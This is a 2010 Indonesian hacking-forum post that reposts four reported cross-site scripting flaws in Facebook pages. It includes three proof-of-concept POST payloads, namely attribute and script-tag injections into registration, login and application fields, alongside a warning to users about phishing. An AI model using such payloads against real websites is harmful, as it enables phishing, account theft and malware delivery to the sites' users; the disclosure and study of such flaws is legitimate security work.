GPL - Cyber Team
Welcome To Indonesian GPL - Team Community
ini adalah forum untuk saling berbagi ilmu tentang dunia IT
silahkan daftar dan bergabung bersama kami.
jangan takut tersaingi karena kita telah berbagi, menjadi seseorang yang berada tertinggi sendiri itu tidak mengenakan, berbagi itu indah
regard`s GPL - Team
GPL - Cyber Team
Welcome To Indonesian GPL - Team Community
ini adalah forum untuk saling berbagi ilmu tentang dunia IT
silahkan daftar dan bergabung bersama kami.
jangan takut tersaingi karena kita telah berbagi, menjadi seseorang yang berada tertinggi sendiri itu tidak mengenakan, berbagi itu indah
regard`s GPL - Team
GPL - Cyber Team
Would you like to react to this message? Create an account in a few clicks or log in to continue.

GPL - Cyber Team

Kita Senang Berbagi
 
IndeksGalleryLatest imagesPencarianPendaftaranLogin
Welcome To Indonesian GPL - Team Community
Statistics
Total 372 user terdaftar
User terdaftar terakhir adalah nurfatriani

Total 135 kiriman artikel dari user in 84 subjects

 

 kelemahan facebook

Go down 
PengirimMessage
andysoekamti
Staf GPL
Staf GPL
andysoekamti


Jumlah posting : 103
Points : 258
Join date : 27.06.10
Age : 30
Lokasi : Bekasi

kelemahan facebook Empty
PostSubyek: kelemahan facebook   kelemahan facebook EmptySun Jul 04, 2010 11:09 am

ni tutor dari sahabat sy juga... nmanya chandra aditia...

Para pengguna Facebook rentan akan serangan phishing dan pencurian ID dikarenakan munculnya kelemahan cross-site scripting yang terbaru dan cukup kritis.

Peneliti keamanan Zeitjak, David Wharton, Daimon dan p3lo baru-baru ini menemukan cacat XSS yang berpengaruh terhadap beberapa fungsionalitas Facebook termasuk halaman developer, halaman registrasi pengguna baru, halaman login iphone dan halaman aplikasi.


Orang-orang jahat dapat mengeksploitasi bugs XSS ini untuk menginfeksi jutaan anggota Facebook dengan malware, adware dan spyware.

Biar aman, anda dianjurkan untuk tidak menerima friend invitation dari orang yang tidak anda kenal. Alasannya adalah bahwa profil di Facebook berisikan informasi pribadi yang cukup berharga untuk dipelajari oleh fraudster (teman anda yang tidak dikenal). Para teman yang tak 'diundang' ini bertujuan untuk melancarkan serangan phishing atau menyebarkan malware pada pengguna individual maupun bisnis. Bagaimana jika anda mengklik sebuah shared link atau apapun? Maka siap-siap saja privasi anda akan menjadi milik mereka!!!

Berikut ini keempat cacat XSS yang ditemukan, untuk mengetahui seperti apa cacatnya klik link bertuliskan Mirror:

XSS #1 dengan POST (oleh Zeitjak) | Mirror:

[You must be registered and logged in to see this link.]

POST: reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar

XSS #2 dengan POST (oleh David Wharton) | Mirror:

[You must be registered and logged in to see this link.]

POST:

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

XSS #3 (oleh DaiMon) | Mirror:

[You must be registered and logged in to see this link.]

This one works on another IP (67.228.87.82) and can't be used for a worm, except a phishing one.

XSS #4 dengan POST (oleh p3lo) | Mirror:

[You must be registered and logged in to see this link.]

POST:

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=


sekian... kelemahan facebook 973763
Kembali Ke Atas Go down
http://heckeria.net
 
kelemahan facebook
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
GPL - Cyber Team :: Hacking Forum :: Hacking Area :: Facebook Hacking-
Navigasi: